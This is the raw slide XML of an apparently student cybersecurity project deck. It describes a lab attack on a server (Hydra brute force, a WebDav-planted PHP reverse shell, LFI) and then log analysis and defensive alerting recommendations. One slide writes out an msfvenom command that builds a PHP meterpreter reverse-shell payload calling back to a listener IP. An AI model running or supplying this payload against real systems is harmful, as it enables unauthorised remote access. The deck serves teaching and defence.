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Thin"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
      <p:italic r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId38"/>
      <p:bold r:id="rId39"/>
      <p:italic r:id="rId40"/>
      <p:boldItalic r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId42"/>
      <p:bold r:id="rId43"/>
      <p:italic r:id="rId44"/>
      <p:boldItalic r:id="rId45"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto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234C38-0285-4585-AF8B-4126F52289B3}">
  <a:tblStyle styleId="{96234C38-0285-4585-AF8B-4126F52289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Roboto-regular.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-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Light-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20af2b2d5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20af2b2d5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20af2b2d5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20af2b2d5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2352a751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12352a751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8.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3.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54.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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image" Target="../media/image5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61.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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6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9.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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22.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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78.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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0.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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0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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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0" name="Google Shape;1020;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178725" y="3771900"/>
            <a:ext cx="698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By Alfonso Gomez, Silas White, Nathaniel Martinez</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Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1130" name="Google Shape;1130;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31" name="Google Shape;113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2" name="Google Shape;1132;p63"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1133" name="Google Shape;1133;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="913525" y="1284250"/>
            <a:ext cx="7316975" cy="3632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Reverse Shell Backdoor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1139" name="Google Shape;1139;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0" name="Google Shape;1140;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4"/>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Created a reverse shell using msfvenom to establish a remote lister and open a backdoor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42" name="Google Shape;1142;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1143" name="Google Shape;1143;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4" name="Google Shape;1144;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64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1146" name="Google Shape;1146;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7" name="Google Shape;1147;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64"/>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4"/>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reverse-shell planted using WebDav gave me remote access to the target machine. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1150" name="Google Shape;1150;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1151" name="Google Shape;1151;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2" name="Google Shape;1152;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3" name="Google Shape;1153;p64"/>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4"/>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Command</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 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt; shell.php</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Reverse Shell Backdoor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160" name="Google Shape;1160;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61" name="Google Shape;116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2" name="Google Shape;1162;p65"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1163" name="Google Shape;1163;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1750700" y="1040775"/>
            <a:ext cx="5102875" cy="37813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Local File Inclusion (LFI)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169" name="Google Shape;116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0" name="Google Shape;1170;p66"/>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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480625"/>
            <a:ext cx="2371500" cy="12651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 used msfvenom and meterpreter to deliver a malicious payload onto the vulnerable server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72" name="Google Shape;1172;p66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1173" name="Google Shape;1173;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74" name="Google Shape;1174;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66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="724281" y="1276688"/>
            <a:ext cx="2901867" cy="1901014"/>
            <a:chOff x="-2808348" y="1885638"/>
            <a:chExt cx="3783399" cy="2478182"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1176" name="Google Shape;1176;p66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2808348" y="3742520"/>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77" name="Google Shape;1177;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66"/>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6"/>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t/>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1180" name="Google Shape;1180;p66"/>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6"/>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Screenshot</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p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1182" name="Google Shape;1182;p66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3395806" y="971990"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1183" name="Google Shape;1183;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84" name="Google Shape;1184;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85" name="Google Shape;1185;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1682800"/>
            <a:ext cx="5333625" cy="2952025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1186" name="Google Shape;1186;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836275" y="3300725"/>
            <a:ext cx="22596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Achievements</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Using the multi/handler exploit I was able to get access to the machine’s shell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6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92" name="Google Shape;1192;p67"/>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93" name="Google Shape;1193;p6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99" name="Google Shape;1199;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-569850" y="527025"/>
            <a:ext cx="4114800" cy="12696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t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1200" name="Google Shape;1200;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1" name="Google Shape;1201;p68"/>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202" name="Google Shape;1202;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712025" y="675975"/>
            <a:ext cx="4911000" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1203" name="Google Shape;1203;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3761300" y="835137"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1204" name="Google Shape;1204;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273825" y="4248025"/>
            <a:ext cx="85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05" name="Google Shape;1205;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="273830" y="576950"/>
            <a:ext cx="4951796" cy="2255275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1206" name="Google Shape;1206;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="2875486"/>
            <a:ext cx="8120798" cy="1335638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207" name="Google Shape;1207;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5284125" y="1517150"/>
            <a:ext cx="3339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At 17:30 there are approximately 5,000 packets sent from one singular ip, indicating a port scan. About 15 minutes later the attacker started a brute force attack, as indicated by the approximately 16,000 packets sent around 17:40.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13" name="Google Shape;1213;p69"/>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600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1214" name="Google Shape;1214;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5" name="Google Shape;1215;p69"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1437475"/>
            <a:ext cx="8379449" cy="1808300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="485425" y="3245775"/>
            <a:ext cx="8379448" cy="759950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1218" name="Google Shape;1218;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377425" y="4122200"/>
            <a:ext cx="848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There were nearly 16,000 HTTP 401 requests, indicating a brute force attack. A closer look at the logs reveals that the user agent for these 401 requests was Hydra, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>known tool used for brute-force attacks.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24" name="Google Shape;1224;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5" name="Google Shape;1225;p70"/>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226" name="Google Shape;1226;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="814075" y="4018600"/>
            <a:ext cx="714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15,927 HTTP requests were made to the secret_folder around 17:40 on 3/26/2020. This folder contained a hash for the user Ryan’s credentials. Ryan has permission to upload files the company server. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1227" name="Google Shape;1227;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367351" y="1467775"/>
            <a:ext cx="8409299" cy="2384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33" name="Google Shape;1233;p71"/>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600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1234" name="Google Shape;1234;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5" name="Google Shape;1235;p71"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1236" name="Google Shape;1236;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367351" y="1467775"/>
            <a:ext cx="8409299" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1237" name="Google Shape;1237;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695675" y="3670750"/>
            <a:ext cx="780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355 total requests were made to the WebDav folder. Of these 198 were made to the shell.php file (a malicious file the attacker used to gain access to the system). 62 requests were made to the passwd file, which contains user information.</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pic>
        <p:nvPicPr>
          <p:cNvPr id="1242" name="Google Shape;1242;p72"/>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43" name="Google Shape;1243;p72"/>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44" name="Google Shape;1244;p7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6" name="Google Shape;1026;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7" name="Google Shape;1027;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8" name="Google Shape;1028;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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1030" name="Google Shape;1030;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1" name="Google Shape;1031;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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1033" name="Google Shape;1033;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4" name="Google Shape;1034;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55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1036" name="Google Shape;1036;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7" name="Google Shape;1037;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55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1039" name="Google Shape;1039;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40" name="Google Shape;1040;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 name="Google Shape;1041;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2" name="Google Shape;1042;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6" name="Google Shape;1046;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7" name="Google Shape;1047;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50" name="Google Shape;1250;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1" name="Google Shape;1251;p73"/>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endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>An alert could be set to trigger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>when a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> large amount of traffic occurs over multiple ports from a single source ip</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threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A possible threshold could be more than 10 requests per second from any single ip</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1252" name="Google Shape;1252;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304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Only allow traffic over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>necessary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> ports, deny everything else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317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Configure an IDS to block an ip if the threshold is met</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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58" name="Google Shape;1258;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9" name="Google Shape;1259;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304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>An alert should trigger if hidden directories are accessed from outside the company’s internal network.</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Any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> from outside the internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> and/or from an unauthorized ip should trigger an alert</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1260" name="Google Shape;1260;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304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stronger username and password requirement</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Encrypt contents of sensitive folders such as the hidden directory. In addition, sensitive folders should not be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>accessible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> web browser</a:t>
            </a:r>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317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Create a whitelist of approved ips</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66" name="Google Shape;1266;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7" name="Google Shape;1267;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317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Create an alarm if one ip creates a large amount of HTTP requests in a short amount of time, particularly HTTP 401</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04800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
